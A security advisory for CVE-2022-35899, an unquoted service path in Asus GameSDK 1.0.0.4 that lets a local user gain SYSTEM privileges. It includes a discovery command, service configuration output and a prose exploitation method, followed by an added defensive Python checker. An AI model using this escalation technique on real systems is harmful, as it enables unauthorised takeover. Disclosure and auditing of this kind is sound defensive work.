Headline
Asus GameSDK 1.0.0.4 Unquoted Service Path
Asus GameSDK version 1.0.0.4 suffers from an unquoted service path vulnerability in GameSDK.exe.
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899

# Step to discover the unquoted service path:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Info on the service:

C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem

# Exploit

If an attacker has already compromised the system and the current user has write permission on the "C:\Program Files (x86)\ASUS\" folder or on "C:\", he could place his own "GameSDK.exe" or "Program.exe" file there, respectively. When the service starts, it would launch the malicious file rather than the original "GameSDK.exe".

# Impact

An attacker can elevate his privileges on the system and become NT AUTHORITY\SYSTEM.

# PoC Video

https://youtu.be/u_8JMIgn-5g
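A defender-side check for the condition described above, as an added example that is not part of the original advisory: it flags service binary paths that are unquoted and contain spaces, lists the earlier locations Windows would try (to be checked for unexpected files and write permissions), and gives the quoted form of the path. The function names and the two extra sample services are assumptions made for illustration.

```python
import re

# Constructed sample input: (service name, binary path) pairs. The first path is
# the one shown in the sc qc output above; the other two are invented.
SERVICES = [
    ("GameSDK Service", r"C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\Agent Svc\agent.exe" --run'),
    ("NoSpaceSvc", r"C:\Tools\svc.exe -k"),
]

def split_unquoted(image_path):
    """Split an unquoted binary path into (executable, trailing arguments)."""
    path = image_path.strip()
    m = re.match(r"(.+?\.exe)(?=\s|$)", path, re.IGNORECASE)
    exe = m.group(1) if m else path
    return exe, path[len(exe):]

def shadow_candidates(image_path):
    """Locations Windows tries before the real binary when the path is unquoted."""
    if image_path.strip().startswith('"'):
        return []  # quoted paths are taken as a single token
    exe, _ = split_unquoted(image_path)
    # Each space ends a possible program name, to which ".exe" is appended.
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def audit(services):
    """Return findings for services whose path is unquoted and contains spaces."""
    findings = {}
    for name, image_path in services:
        candidates = shadow_candidates(image_path)
        if candidates:
            exe, args = split_unquoted(image_path)
            findings[name] = {
                "must_not_exist_or_be_creatable": candidates,
                "quoted_path": '"%s"%s' % (exe, args),
            }
    return findings

if __name__ == "__main__":
    for name, finding in audit(SERVICES).items():
        print(name)
        for path in finding["must_not_exist_or_be_creatable"]:
            print("  check:", path)
        print("  fix:  ", finding["quoted_path"])
```

The check works on path strings only, so it can be run against an exported service inventory on any platform; ACLs on the listed locations still have to be reviewed on the host itself.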
Related news
CVE-2022-35899: Asus GameSDK 1.0.0.4 Unquoted Service Path ≈ Packet Storm
There is an unquoted service path in ASUSTeK Aura Ready Game SDK service (GameSDK.exe) 1.0.0.4. This might allow a local user to escalate privileges by creating a %PROGRAMFILES(X86)%\ASUS\GameSDK.exe file.